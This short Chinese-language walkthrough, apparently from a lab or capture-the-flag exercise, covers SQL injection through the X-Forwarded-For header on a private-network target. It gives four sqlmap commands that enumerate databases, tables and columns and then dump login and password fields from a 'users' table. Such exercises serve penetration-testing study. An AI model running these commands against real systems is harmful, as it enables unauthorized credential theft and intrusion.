X-Forwarded-For
SQL注入介绍
信息探测
这些都是基本操作。
打开敏感的网址:
漏洞扫描
添加完目标之后扫描就可以,但是我没使用这个,主要我没安装这个
使用owasp-zap发现有一个高危的漏洞,可以成为sql注入点
漏洞利用
sqlmap -u "http://192.168.56.107" --headers="X-Forwarded-For:*" --dbs --batch
sqlmap -u "http://192.168.56.107" --headers="X-Forwarded-For:*" -D "photoblog" --tables --batch
sqlmap -u "http://192.168.56.107" --headers="X-Forwarded-For:*" -D "photoblog" -T "users" --columns --batch
sqlmap -u "http://192.168.56.107" --headers="X-Forwarded-For:*" -D "photoblog" -T "users" -C"login,password" --dump --batch
使用sqlmap进行注入漏洞
发现所有的数据库
发现数据库的所有表
之后在进行注入,得到用户名以及密码就可以了。(我忘记截图了)
总结
登陆成功,之后使用之前的操作,就可以完美的拿下了!!!
搞定!!!